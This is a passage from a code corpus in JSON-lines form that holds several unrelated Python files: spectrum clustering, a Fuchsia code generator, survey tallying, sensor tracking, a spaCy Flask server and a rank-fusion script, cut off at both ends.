_filter_neighbors_mz(\n precursor_mzs: np.ndarray, idx: np.ndarray, batch_start: int,\n batch_stop: int, precursor_tol_mass: float, precursor_tol_mode: str,\n nn_dists: np.ndarray, nn_idx_ann: np.ndarray,\n num_neighbors: int, distances: np.ndarray, indices: np.ndarray,\n indptr: np.ndarray) -> None:\n \"\"\"\n Filter ANN neighbor indexes by precursor m/z tolerances and assign\n pairwise distances.\n\n Parameters\n ----------\n precursor_mzs : np.ndarray\n Precursor m/z's corresponding to the embeddings.\n idx : np.ndarray\n The indexes corresponding to the embeddings.\n batch_start, batch_stop : int\n The indexes in the precursor m/z's of the current batch.\n precursor_tol_mass : float\n The precursor tolerance mass for embeddings to be considered as\n neighbors.\n precursor_tol_mode : str\n The unit of the precursor m/z tolerance ('Da' or 'ppm').\n nn_dists : np.ndarray\n Distances of the nearest neighbors.\n nn_idx_ann : np.ndarray\n Indexes of the nearest neighbors.\n num_neighbors : int\n The (maximum) number of neighbors to set for each embedding.\n distances : np.ndarray\n The nearest neighbor distances. See `scipy.sparse.csr_matrix` (`data`).\n indices : np.ndarray\n The column indices for the nearest neighbor distances. See\n `scipy.sparse.csr_matrix`.\n indptr : np.ndarray\n The index pointers for the nearest neighbor distances. See\n `scipy.sparse.csr_matrix`.\n \"\"\"\n nn_idx_mz = _get_neighbors_idx(\n precursor_mzs, idx, batch_start, batch_stop, precursor_tol_mass,\n precursor_tol_mode)\n for i, idx_ann, idx_mz, dists in zip(\n idx[batch_start:batch_stop], nn_idx_ann, nn_idx_mz, nn_dists):\n mask = _intersect_idx_ann_mz(idx_ann, idx_mz, num_neighbors)\n indptr[i + 1] = indptr[i] + len(mask)\n distances[indptr[i]:indptr[i + 1]] = dists[mask]\n indices[indptr[i]:indptr[i + 1]] = idx_ann[mask]\n\n\n@nb.njit\ndef _get_neighbors_idx(mzs: np.ndarray, idx: np.ndarray, start_i: int,\n stop_i: int, precursor_tol_mass: float,\n precursor_tol_mode: str) -> List[np.ndarray]:\n \"\"\"\n Filter nearest neighbor candidates on precursor m/z.\n\n Parameters\n ----------\n mzs : np.ndarray\n The precursor m/z's of the nearest neighbor candidates.\n idx : np.ndarray\n The indexes of the nearest neighbor candidates.\n start_i, stop_i : int\n Indexes used to slice the values to be considered in the batch\n (inclusive start_i, exclusive stop_i).\n precursor_tol_mass : float\n The tolerance for vectors to be considered as neighbors.\n precursor_tol_mode : str\n The unit of the tolerance ('Da' or 'ppm').\n\n Returns\n -------\n List[np.ndarray]\n A list of sorted NumPy arrays with the indexes of the nearest neighbor\n candidates for each item.\n \"\"\"\n batch_mzs = mzs[start_i:stop_i]\n if precursor_tol_mode == 'Da':\n min_mz = batch_mzs[0] - precursor_tol_mass\n max_mz = batch_mzs[-1] + precursor_tol_mass\n elif precursor_tol_mode == 'ppm':\n min_mz = batch_mzs[0] - batch_mzs[0] * precursor_tol_mass / 10**6\n max_mz = batch_mzs[-1] + batch_mzs[-1] * precursor_tol_mass / 10**6\n else:\n raise ValueError('Unknown precursor tolerance filter')\n batch_mzs = batch_mzs.reshape((-1, 1))\n match_i = np.searchsorted(mzs, [min_mz, max_mz])\n match_mzs = mzs[match_i[0]:match_i[1]].reshape((1, -1))\n if precursor_tol_mode == 'Da':\n masks = np.abs(batch_mzs - match_mzs) < precursor_tol_mass\n elif precursor_tol_mode == 'ppm':\n masks = (np.abs(batch_mzs - match_mzs) / match_mzs * 10**6\n < precursor_tol_mass)\n match_idx = idx[match_i[0]:match_i[1]]\n # noinspection PyUnboundLocalVariable\n return [np.sort(match_idx[mask]) for mask in masks]\n\n\n@nb.njit\ndef _intersect_idx_ann_mz(idx_ann: np.ndarray, idx_mz: np.ndarray,\n max_neighbors: int) -> np.ndarray:\n \"\"\"\n Find the intersection between identifiers from ANN filtering and precursor\n m/z filtering.\n\n Parameters\n ----------\n idx_ann : np.ndarray\n Identifiers from ANN filtering.\n idx_mz : np.ndarray\n SORTED identifiers from precursor m/z filtering.\n max_neighbors : int\n The maximum number of best matching neighbors to retain.\n\n Returns\n -------\n np.ndarray\n A mask to select the joint identifiers in the `idx_ann` array.\n \"\"\"\n i_mz, idx_ann_order, idx = 0, np.argsort(idx_ann), []\n for i_order, i_ann in enumerate(idx_ann_order):\n if idx_ann[i_ann] != -1:\n while i_mz < len(idx_mz) and idx_mz[i_mz] < idx_ann[i_ann]:\n i_mz += 1\n if i_mz == len(idx_mz):\n break\n if idx_ann[i_ann] == idx_mz[i_mz]:\n idx.append(idx_ann_order[i_order])\n i_mz += 1\n idx = np.asarray(idx)\n return (idx if max_neighbors >= len(idx)\n else np.partition(idx, max_neighbors)[:max_neighbors])\n\n\ndef cluster(distances_filename: str, metadata_filename: str):\n \"\"\"\n DBSCAN clustering of the embeddings based on a pairwise distance matrix.\n\n Parameters\n ----------\n distances_filename : str\n Precomputed pairwise distance matrix file to use for the DBSCAN\n clustering.\n metadata_filename : str\n Metadata file with precursor m/z information for all embeddings.\n \"\"\"\n clusters_filename = (distances_filename.replace('dist_', 'clusters_')\n .replace('.npz', '.npy'))\n if os.path.isfile(clusters_filename):\n return\n\n # DBSCAN clustering of the embeddings.\n logger.info('DBSCAN clustering (eps=%.4f, min_samples=%d) of precomputed '\n 'pairwise distance matrix %s', config.eps, config.min_samples,\n distances_filename)\n # Reimplement DBSCAN preprocessing to avoid unnecessary memory consumption.\n dist = ss.load_npz(distances_filename)\n dist_data, dist_indices, dist_indptr = dist.data, dist.indices, dist.indptr\n num_embeddings = dist.shape[0]\n # Find the eps-neighborhoods for all points.\n logger.debug('Find the eps-neighborhoods for all points (eps=%.4f)',\n config.eps)\n mask = dist_data <= config.eps\n # noinspection PyTypeChecker\n indptr = _cumsum(mask)[dist_indptr]\n indices = dist_indices[mask].astype(np.intp, copy=False)\n neighborhoods = np.split(indices, indptr[1:-1])\n # Initially, all samples are noise.\n # (Memmap for shared memory multiprocessing.)\n cluster_labels = np.lib.format.open_memmap(\n clusters_filename, mode='w+', dtype=np.intp,\n shape=(num_embeddings,))\n cluster_labels.fill(-1)\n # A list of all core samples found.\n n_neighbors = np.fromiter(map(len, neighborhoods), np.uint32)\n core_samples = n_neighbors >= config.min_samples\n # Run Scikit-Learn DBSCAN.\n logger.debug('Run Scikit-Learn DBSCAN inner.')\n neighborhoods_arr = np.empty(len(neighborhoods), dtype=np.object)\n neighborhoods_arr[:] = neighborhoods\n dbscan_inner(core_samples, neighborhoods_arr, cluster_labels)\n\n # Free up memory by deleting DBSCAN-related data structures.\n del dist, dist_data, dist_indices, dist_indptr, mask, indptr, indices\n del neighborhoods, n_neighbors, core_samples, neighborhoods_arr\n gc.collect()\n\n # Refine initial clusters to make sure spectra within a cluster don't have\n # an excessive precursor m/z difference.\n precursor_mzs = (pd.read_parquet(metadata_filename, columns=['mz'])\n .squeeze().values.astype(np.float32))\n logger.debug('Sort cluster labels in ascending order.')\n order = np.argsort(cluster_labels)\n reverse_order = np.argsort(order)\n cluster_labels[:] = cluster_labels[order]\n precursor_mzs = precursor_mzs[order]\n logger.debug('Finetune %d initial cluster assignments to not exceed %d %s '\n 'precursor m/z tolerance', cluster_labels[-1] + 1,\n config.precursor_tol_mass, config.precursor_tol_mode)\n if cluster_labels[-1] == -1: # Only noise samples.\n cluster_labels.fill(-1)\n else:\n group_idx = nb.typed.List(_get_cluster_group_idx(cluster_labels))\n n_clusters = nb.typed.List(joblib.Parallel(n_jobs=-1)(\n joblib.delayed(_postprocess_cluster)\n (cluster_labels[start_i:stop_i], precursor_mzs[start_i:stop_i],\n config.precursor_tol_mass, config.precursor_tol_mode,\n config.min_samples) for start_i, stop_i in group_idx))\n _assign_unique_cluster_labels(cluster_labels, group_idx,\n n_clusters, config.min_samples)\n cluster_labels[:] = cluster_labels[reverse_order]\n cluster_labels.flush()\n logger.debug('%d unique clusters after precursor m/z finetuning',\n np.amax(cluster_labels) + 1)\n\n\n@nb.njit\ndef _cumsum(a: np.ndarray) -> np.ndarray:\n \"\"\"\n Cumulative sum of the elements.\n\n Try to avoid inadvertent copies in `np.cumsum`.\n\n Parameters\n ----------\n a : np.ndarray\n Input array\n\n Returns\n -------\n np.ndarray\n The cumulative sum in an array of size len(a) + 1 (first element is 0).\n \"\"\"\n out = np.zeros(len(a) + 1, dtype=np.int64)\n for i in range(len(out) - 1):\n out[i + 1] = out[i] + a[i]\n return out\n\n\n@nb.njit\ndef _get_cluster_group_idx(clusters: np.ndarray) -> Iterator[Tuple[int, int]]:\n \"\"\"\n Get start and stop indexes for unique cluster labels.\n\n Parameters\n ----------\n clusters : np.ndarray\n The ordered cluster labels (noise points are -1).\n\n Returns\n -------\n Iterator[Tuple[int, int]]\n Tuples with the start index (inclusive) and end index (exclusive) of\n the unique cluster labels.\n \"\"\"\n start_i = 0\n while clusters[start_i] == -1 and start_i < clusters.shape[0]:\n start_i += 1\n stop_i = start_i\n while stop_i < clusters.shape[0]:\n start_i, label = stop_i, clusters[stop_i]\n while stop_i < clusters.shape[0] and clusters[stop_i] == label:\n stop_i += 1\n yield start_i, stop_i\n\n\ndef _postprocess_cluster(cluster_labels: np.ndarray, cluster_mzs: np.ndarray,\n precursor_tol_mass: float, precursor_tol_mode: str,\n min_samples: int) -> int:\n \"\"\"\n Agglomerative clustering of the precursor m/z's within each initial\n cluster to avoid that spectra within a cluster have an excessive precursor\n m/z difference.\n\n Parameters\n ----------\n cluster_labels : np.ndarray\n Array in which to write the cluster labels.\n cluster_mzs : np.ndarray\n Precursor m/z's of the samples in a single initial cluster.\n precursor_tol_mass : float\n Maximum precursor mass tolerance for points to be clustered together.\n precursor_tol_mode : str\n The unit of the precursor m/z tolerance ('Da' or 'ppm').\n min_samples : int\n The minimum number of samples in a cluster.\n\n Returns\n -------\n int\n The number of clusters after splitting on precursor m/z.\n \"\"\"\n cluster_labels.fill(-1)\n # No splitting needed if there are too few items in cluster.\n # This seems to happen sometimes despite that DBSCAN requires a higher\n # `min_samples`.\n if cluster_labels.shape[0] < min_samples:\n n_clusters = 0\n else:\n # Group items within the cluster based on their precursor m/z.\n # Precursor m/z's within a single group can't exceed the specified\n # precursor m/z tolerance (`distance_threshold`).\n # Subtract 1 because fcluster starts with cluster label 1 instead of 0\n # (like Scikit-Learn does).\n cluster_assignments = fcluster(\n _linkage(cluster_mzs, precursor_tol_mode),\n precursor_tol_mass, 'distance') - 1\n n_clusters = cluster_assignments.max() + 1\n # Update cluster assignments.\n if n_clusters == 1:\n # Single homogeneous cluster.\n cluster_labels.fill(0)\n elif n_clusters == cluster_mzs.shape[0]:\n # Only singletons.\n n_clusters = 0\n else:\n unique, inverse, counts = np.unique(\n cluster_assignments, return_inverse=True, return_counts=True)\n non_noise_clusters = np.where(counts >= min_samples)[0]\n labels = -np.ones_like(unique)\n labels[non_noise_clusters] = np.unique(unique[non_noise_clusters],\n return_inverse=True)[1]\n cluster_labels[:] = labels[inverse]\n n_clusters = len(non_noise_clusters)\n return n_clusters\n\n\n@nb.njit\ndef _linkage(mzs: np.ndarray, precursor_tol_mode: str) -> np.ndarray:\n \"\"\"\n Perform hierarchical clustering of a one-dimensional m/z array.\n\n Because the data is one-dimensional, no paiwise distance matrix needs to be\n computed, but rather sorting can be used.\n\n For information on the linkage output format, see:\n https://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html\n\n Parameters\n ----------\n mzs : np.ndarray\n The precursor m/z's for which pairwise distances are computed.\n precursor_tol_mode : str\n The unit of the precursor m/z tolerance ('Da' or 'ppm').\n\n Returns\n -------\n np.ndarray\n The hierarchical clustering encoded as a linkage matrix\n \"\"\"\n linkage = np.zeros((mzs.shape[0] - 1, 4), np.double)\n # min m/z, max m/z, cluster index, number of cluster elements\n clusters = [(mzs[i], mzs[i], i, 1) for i in np.argsort(mzs)]\n for it in range(mzs.shape[0] - 1):\n min_dist, min_i = np.inf, -1\n for i in range(len(clusters) - 1):\n dist = suu.mass_diff(clusters[i + 1][1], clusters[i][0],\n precursor_tol_mode == 'Da')\n if dist < min_dist:\n min_dist, min_i = dist, i\n n_points = clusters[min_i][3] + clusters[min_i + 1][3]\n linkage[it, :] = [clusters[min_i][2], clusters[min_i + 1][2],\n min_dist, n_points]\n clusters[min_i] = (clusters[min_i][0], clusters[min_i + 1][1],\n mzs.shape[0] + it, n_points)\n del clusters[min_i + 1]\n\n return linkage\n\n\n@nb.njit\ndef _assign_unique_cluster_labels(cluster_labels: np.ndarray,\n group_idx: nb.typed.List,\n n_clusters: nb.typed.List,\n min_samples: int) -> None:\n \"\"\"\n Make sure all cluster labels are unique after potential splitting of\n clusters to avoid excessive precursor m/z differences.\n\n Parameters\n ----------\n cluster_labels : np.ndarray\n Cluster labels per cluster grouping.\n group_idx : nb.typed.List[Tuple[int, int]]\n Tuples with the start index (inclusive) and end index (exclusive) of\n the cluster groupings.\n n_clusters: nb.typed.List[int]\n The number of clusters per cluster grouping.\n min_samples : int\n The minimum number of samples in a cluster.\n \"\"\"\n current_label = 0\n for (start_i, stop_i), n_cluster in zip(group_idx, n_clusters):\n if n_cluster > 0 and stop_i - start_i >= min_samples:\n current_labels = cluster_labels[start_i:stop_i]\n current_labels[current_labels != -1] += current_label\n current_label += n_cluster\n else:\n cluster_labels[start_i:stop_i].fill(-1)\n\n\ndef get_cluster_medoids(clusters_filename: str, distances_filename: str):\n \"\"\"\n Get indexes of the cluster representative spectra (medoids).\n\n Parameters\n ----------\n clusters_filename : str\n Cluster label assignments file.\n distances_filename : str\n Precomputed pairwise distance matrix file to use for the DBSCAN\n clustering.\n\n Returns\n -------\n Optional[np.ndarray]\n The indexes of the medoid elements for all non-noise clusters, or None\n if only noise clusters are present.\n \"\"\"\n pairwise_dist_matrix = ss.load_npz(distances_filename)\n return _get_cluster_medoids(\n np.load(clusters_filename), pairwise_dist_matrix.indptr,\n pairwise_dist_matrix.indices, pairwise_dist_matrix.data)\n\n\n@nb.njit(parallel=True)\ndef _get_cluster_medoids(clusters: np.ndarray,\n pairwise_indptr: np.ndarray,\n pairwise_indices: np.ndarray,\n pairwise_data: np.ndarray) \\\n -> Optional[np.ndarray]:\n \"\"\"\n Get indexes of the cluster representative spectra (medoids).\n\n Parameters\n ----------\n clusters : np.ndarray\n Cluster label assignments.\n pairwise_indptr : np.ndarray\n The index pointers for the nearest neighbor distances. See\n `scipy.sparse.csr_matrix`.\n pairwise_indices : np.ndarray\n The column indices for the nearest neighbor distances. See\n `scipy.sparse.csr_matrix`.\n pairwise_data : np.ndarray\n The nearest neighbor distances. See `scipy.sparse.csr_matrix` (`data`).\n\n Returns\n -------\n Optional[np.ndarray]\n The indexes of the medoid elements for all non-noise clusters, or None\n if only noise clusters are present.\n \"\"\"\n order, min_i = np.argsort(clusters), 0\n while min_i < clusters.shape[0] and clusters[order[min_i]] == -1:\n min_i += 1\n # Only noise clusters.\n if min_i == clusters.shape[0]:\n return None\n # Find the indexes of the representatives for each unique cluster.\n cluster_idx, max_i = [], min_i\n while max_i < order.shape[0]:\n while (max_i < order.shape[0] and\n clusters[order[min_i]] == clusters[order[max_i]]):\n max_i += 1\n cluster_idx.append((min_i, max_i))\n min_i = max_i\n representatives = np.empty(len(cluster_idx), np.uint)\n for i in nb.prange(len(cluster_idx)):\n representatives[i] = _get_cluster_medoid_index(\n order[cluster_idx[i][0]:cluster_idx[i][1]], pairwise_indptr,\n pairwise_indices, pairwise_data)\n return representatives\n\n\n@nb.njit(fastmath=True)\ndef _get_cluster_medoid_index(cluster_mask: np.ndarray,\n pairwise_indptr: np.ndarray,\n pairwise_indices: np.ndarray,\n pairwise_data: np.ndarray) -> int:\n \"\"\"\n Get the index of the cluster medoid element.\n\n Parameters\n ----------\n cluster_mask : np.ndarray\n Indexes of the items belonging to the current cluster.\n pairwise_indptr : np.ndarray\n The index pointers for the nearest neighbor distances. See\n `scipy.sparse.csr_matrix`.\n pairwise_indices : np.ndarray\n The column indices for the nearest neighbor distances. See\n `scipy.sparse.csr_matrix`.\n pairwise_data : np.ndarray\n The nearest neighbor distances. See `scipy.sparse.csr_matrix` (`data`).\n\n Returns\n -------\n int\n The index of the cluster's medoid element.\n \"\"\"\n if len(cluster_mask) <= 2:\n # Pairwise distances will be identical.\n return cluster_mask[0]\n min_i, min_avg = 0, np.inf\n for row_i in range(cluster_mask.shape[0]):\n indices = pairwise_indices[pairwise_indptr[cluster_mask[row_i]]:\n pairwise_indptr[cluster_mask[row_i] + 1]]\n data = pairwise_data[pairwise_indptr[cluster_mask[row_i]]:\n pairwise_indptr[cluster_mask[row_i] + 1]]\n col_i = np.asarray([i for cm in cluster_mask\n for i, ind in enumerate(indices) if cm == ind])\n row_avg = np.mean(data[col_i])\n if row_avg < min_avg:\n min_i, min_avg = row_i, row_avg\n return cluster_mask[min_i]\n","sub_path":"gleams/cluster/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":36258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"560421314","text":"#!/usr/bin/env python3.8\n# Copyright 2021 The Fuchsia Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport argparse\nimport os\nimport sys\nfrom jinja2 import Environment, FileSystemLoader\n\n\ndef main(args_list=None):\n parser = argparse.ArgumentParser(\n description='Generate FFX Services Register Macro')\n parser.add_argument(\n '--template',\n help='The template file to use to generate code',\n required=True)\n parser.add_argument(\n '--out', help='The output file to generate', required=True)\n parser.add_argument(\n '--deps', help='Comma-separated list of protocols', required=True)\n parser.add_argument(\n '--deps_full',\n help='Comma-separated list of protocol labels',\n required=True)\n if args_list:\n args = parser.parse_args(args_list)\n else:\n args = parser.parse_args()\n\n # Zip together deps with their full path.\n deps = zip(args.deps.split(\",\"), args.deps_full.split(\",\"))\n deps = list(map(lambda i: {'lib': i[0], 'target': i[1]}, deps))\n\n template_dir, template_name = os.path.split(args.template)\n env = Environment(\n loader=FileSystemLoader(template_dir),\n trim_blocks=True,\n lstrip_blocks=True)\n template = env.get_template(template_name)\n with open(args.out, 'w') as f:\n render = template.render(deps=deps)\n f.write(render)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"src/developer/ffx/build/gn_generate_protocols_macro.py","file_name":"gn_generate_protocols_macro.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"577107108","text":"import csv\nfrom datetime import datetime\n\ndef get_responses_as_list():\n with open('responses.csv') as csv_file:\n\n reader = csv.reader(csv_file)\n\n return list(reader)\n\nresponses = get_responses_as_list()\n\ndef before_cutoff_date(date):\n\n cutoff_date = datetime(2017, 3, 10, 17)\n\n response_date = datetime.strptime(date, '%m/%d/%Y %H:%M:%S')\n\n return response_date < cutoff_date\n\ndef num_skipped(answers):\n return len(list(filter(lambda x: x == '', answers)))\n\ndef is_valid_response(row):\n return num_skipped(row[1:]) < 10 and before_cutoff_date(row[0])\n\nprint (len(responses))\n\nquestions = responses[0][1:]\n\nresponses = list(filter(is_valid_response, responses[1:]))\n\nprint (len(responses))\n\nnum_questions = []\n\nfor i, q in enumerate(questions):\n\n totals = {\n 'Strongly Agree': 0,\n 'Agree': 0,\n 'Neutral': 0,\n 'Disagree': 0,\n 'Strongly Disagree': 0\n }\n\n for response in responses:\n\n answer = response[i+1]\n\n if answer:\n totals[answer] += 1\n\n num_questions.append(totals)\n\ndef get_total(totals, response):\n return [total[response] for total in totals]\n\nwith open('totals.csv', 'wb') as csv_file:\n writer = csv.writer(csv_file)\n\n writer.writerow(['Response'] + questions)\n\n writer.writerow(['Strongly Agree'] + get_total(num_questions, 'Strongly Agree'))\n writer.writerow(['Agree'] + get_total(num_questions, 'Agree'))\n writer.writerow(['Neutral'] + get_total(num_questions, 'Neutral'))\n writer.writerow(['Disagree'] + get_total(num_questions, 'Disagree'))\n writer.writerow(['Strongly Disagree'] + get_total(num_questions, 'Strongly Disagree'))\n\nprint(num_questions)\n","sub_path":"responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"593622604","text":"import json\nimport shortuuid as shortId\n\nclass DBDetailsHandler:\n @staticmethod\n def getAllDetails():\n try:\n f= open(\"database/Details.json\")\n details = f.read()\n f.close()\n except:\n return { \"status\": 500 }\n\n detailsJSON = json.loads(details)\n return { \"status\": 200, \"data\": detailsJSON }\n\n @staticmethod\n def getDetailsById(idDetail, idMatch):\n if idDetail == \"\" or idMatch == \"\":\n return { \"status\": 404 }\n\n res = DBDetailsHandler.getAllDetails()\n\n if res[\"status\"] == 500:\n return { \"status\": 500 }\n\n if res[\"status\"] == 200:\n dataDetails = res[\"data\"]\n for i in range(0, len(dataDetails)):\n if dataDetails[i][\"idDetail\"] == idDetail and dataDetails[i][\"idMatch\"] == idMatch:\n return { \"status\": 200, \"data\": dataDetails[i] }\n\n return { \"status\": 404 }\n\n @staticmethod\n def writeAllDetails(details):\n with open(\"database/Details.json\", \"w\") as writeFile:\n json.dumps(details, writeFile)\n writeFile.close()\n\n @staticmethod\n def createNewDetai(detailInfo):\n \"\"\"\n detailInfo: dict type\n - idDetail, idMatch: required\n \"\"\"\n pass","sub_path":"src/utils/db/details/DBDetailsHandler.py","file_name":"DBDetailsHandler.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"194180155","text":"# project\nimport tracking.helpers as hlp\nfrom config.locations import locations\n\n\nclass Sensor():\n\n \"\"\"\n Handles data and new events for a single sensor.\n One Sensor object per sensor in scheme.\n Handles buffering scheme for grouping CCONs.\n\n \"\"\"\n\n def __init__(self, device, sensor_id):\n \"\"\"\n Sensor class constructor.\n\n Parameters\n ----------\n device : dict\n Dictionary of device information fetched from API by Director.\n sensor_id : str\n Sensor identifier.\n\n \"\"\"\n\n # give arguments to self\n self.device = device\n self.sensor_id = sensor_id\n\n # initialise lists and dictionaries\n self.unixtime = []\n self.values = []\n self.rssi = []\n self.ccons = {}\n self.ccon_ids = []\n self.max_rssi = []\n\n # initialise variables\n self.n_events = 0\n self.last_event = -1\n self.buffering = False\n self.event_buffer = []\n\n # initialise ccon list with zones information\n self.__initialise_ccons_list()\n\n \n def __initialise_ccons_list(self):\n \"\"\"\n In order to keep the order of zones, initialise internal\n CCON- and data lists in order provided by locations list.\n\n \"\"\"\n\n # iterate predefined locations\n for loc in locations:\n # iterate ccons at location\n for ccon in loc['ccons']:\n # update internal ccon list\n self.ccons[ccon] = len(self.ccons)\n self.rssi.append([None])\n\n # update data lists with initial None value\n # this is to ensure same length in all lists\n self.unixtime.append(None)\n self.max_rssi.append(None)\n\n # iterate event counter to reflect initialisation\n self.n_events += 1\n\n # create locations map\n # this is to relate a location id to each CCON\n self.location_map = []\n\n # iterate locaitons\n for i in range(len(locations)):\n # iterate ccons at location\n for j in range(len(locations[i]['ccons'])):\n # update ccon with the location identifier integer\n self.location_map.append(i)\n\n # unknown ccons will have the the id n+1\n self.location_map_unknown = i + 1\n\n\n def get_timestamps(self):\n \"\"\"\n Returns unixtime axis converted to pandas datetime for visualization purposes.\n\n Returns\n -------\n return : list\n List of pandas datetime objects converted from unixtimes.\n\n \"\"\"\n\n return hlp.ux2tx(self.unixtime)\n \n\n def get_values(self):\n \"\"\"\n Returns values stored in sensor main list.\n\n Returns\n -------\n return : list\n List of main values of sensor object.\n\n \"\"\"\n\n return self.values\n\n\n def new_event_data(self, event):\n \"\"\"\n Receive new event data from Director.\n Apply new event to buffering scheme where the same \n event som different CCONs are combined.\n\n Parameters\n ----------\n event : dict\n Dictionary of event information received in the stream.\n\n \"\"\"\n\n # isolate event ccon\n ccon = event['data']['networkStatus']['cloudConnectors'][0]\n\n # check if ccon already in buffer\n exists = False\n for i in range(len(self.event_buffer)):\n e_ccon = self.event_buffer[i]['data']['networkStatus']['cloudConnectors'][0]\n if e_ccon['id'] == ccon['id']:\n self.event_buffer[i] = event\n exists = True\n\n # add to buffer\n if not exists:\n self.event_buffer.append(event)\n\n # get unixtime of this event\n _, ux = hlp.convert_event_data_timestamp(event['data']['networkStatus']['updateTime'])\n\n # update buffer timer\n self.last_event = ux\n self.buffering = True\n \n\n def update_event_data(self, ux_calltime):\n \"\"\"\n Updates rssi matrix and CCON lists.\n Is called when buffer is complete.\n\n Parameters\n ----------\n ux_calltime : int\n Unixtime when function is called.\n\n \"\"\"\n\n # get unixtime of events\n _, ux = hlp.convert_event_data_timestamp(self.event_buffer[-1]['data']['networkStatus']['updateTime'])\n self.unixtime.append(ux_calltime)\n\n # update event counter\n self.n_events += 1\n\n # iterate each event ccon\n for event in self.event_buffer:\n # isolate ccon\n ccon = event['data']['networkStatus']['cloudConnectors'][0]\n\n # add new ccon if not yet known\n if ccon['id'] not in self.ccons:\n # add new row to rssi matrix\n self.rssi.append([0 for i in range(self.n_events-1)])\n\n # add ccon id to index lookup dictionary\n self.ccons[ccon['id']] = len(self.ccons)\n self.ccon_ids.append(ccon['id'])\n self.location_map.append(self.location_map_unknown)\n \n # append rssi\n self.rssi[self.ccons[ccon['id']]].append(ccon['signalStrength'])\n\n # append minimum value to non-talking ccon rows\n for i in range(len(self.rssi)):\n if len(self.rssi[i]) < self.n_events:\n self.rssi[i].append(0)\n\n # get max rssi\n argmax = -1\n valmax = -1\n for i in range(len(self.rssi)):\n if self.rssi[i][-1] > valmax:\n valmax = self.rssi[i][-1]\n argmax = i\n\n self.max_rssi.append(argmax)\n\n # reset buffer variables\n self.buffering = False\n self.event_buffer = []\n\n\n def update_empty(self, ux_calltime):\n \"\"\"\n Appends rssi matrix and other lists with empty / None values.\n Called when sensor has not talked to a CCON in some time.\n\n Parameters\n ----------\n ux_calltime : int\n Unixtime when function is called.\n\n \"\"\"\n\n self.n_events += 1\n\n # check how much time has passed since last event\n self.unixtime.append(ux_calltime)\n self.max_rssi.append(None)\n\n # append minimum value to non-talking ccon rows\n for i in range(len(self.rssi)):\n if len(self.rssi[i]) < self.n_events:\n self.rssi[i].append(0)\n\n","sub_path":"tracking/sensors.py","file_name":"sensors.py","file_ext":"py","file_size_in_byte":6453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"171607129","text":"from django import template\n\nimport markdown\nfrom markdown.extensions.wikilinks import WikiLinkExtension\n\n\nregister = template.Library()\n\n\n@register.filter\ndef markdown2html(value):\n return markdown.markdown(value, extensions=[\n 'gfm',\n WikiLinkExtension(base_url='../'),\n ], output_format='html5')\n","sub_path":"wiki/templatetags/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177766254","text":"def reverse_vowel(str1):\r\n vowels=\"\"\r\n for char in str1:\r\n if char in \"aeiouAEIOU\":\r\n vowels += char\r\n result_string=\"\"\r\n for char in str1:\r\n if char in \"aeiouAEIOU\":\r\n result_string += vowels[-1]\r\n vowels=vowels[:-1]\r\n else:\r\n result_string += char\r\n return result_string\r\nprint(reverse_vowel(\"Komal\"))\r\n","sub_path":"Reverse_Vowel.py","file_name":"Reverse_Vowel.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"591440595","text":"from flask import Flask\nfrom flask import request\nimport spacy\nimport os\nimport uuid\nimport pathlib\nfrom spacyserver import common, train_new_entity_type, train_textcat\n\napp = Flask(__name__)\nid_models = dict()\n\ndef response_403(id):\n return 'App {0} is not updated correctly!'.format(id), 403\n\ndef response_404(id):\n return 'App {0} does not exist!'.format(id), 404\n\n@app.route('/create_app')\ndef create_app():\n id = str(uuid.uuid4())\n app_dir = common.get_app_dir(id)\n pathlib.Path(app_dir).mkdir(parents=True, exist_ok=True)\n return id\n\n@app.route('/update_app/', methods=['POST'])\ndef update_app(id):\n app_dir = common.get_app_dir(id)\n if not os.path.exists(app_dir):\n return response_404(id)\n json_data = common.load_json(request.data, app_dir)\n nlp_c = train_textcat.main(json_data, output_dir=common.get_category_dir(app_dir))\n nlp_e = train_new_entity_type.main(json_data, output_dir=common.get_entity_dir(app_dir))\n id_models[id] = (nlp_c, nlp_e)\n return id\n\n@app.route('/query_app//')\ndef query_app(id, query):\n if not id in id_models:\n app_dir = common.get_app_dir(id)\n if not os.path.exists(app_dir):\n return response_404(id)\n c_dir = common.get_category_dir(app_dir)\n e_dir = common.get_entity_dir(app_dir)\n try:\n nlp_c = spacy.load(c_dir)\n nlp_e = spacy.load(e_dir)\n id_models[id] = (nlp_c, nlp_e)\n except:\n return response_403(id)\n\n nlp_c, nlp_e = id_models[id]\n doc_category = nlp_c(query)\n doc_entity = nlp_e(query)\n return {\n \"cats\": doc_category.cats,\n \"ents\": [(ent.label_, ent.text) for ent in doc_entity.ents],\n }\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"Tools/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116215362","text":"from typing import List, Tuple, Dict\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom tqdm import tqdm\nfrom .util import read_trec, write_trec, combine\n\nimport pandas as pd\n\n\neps = 1e-6\n\ndef combmnz_query(query_scores: List[pd.DataFrame]) -> List[Tuple[str, float]]:\n docs = defaultdict(list)\n scores = {}\n\n for system in query_scores:\n #max_score = max(pd.to_numeric(system.score))\n #min_score = min(pd.to_numeric(system.score))\n\n #scorediff = max(max_score - min_score, eps)\n\n for row in system.itertuples():\n #new_score = (row.score 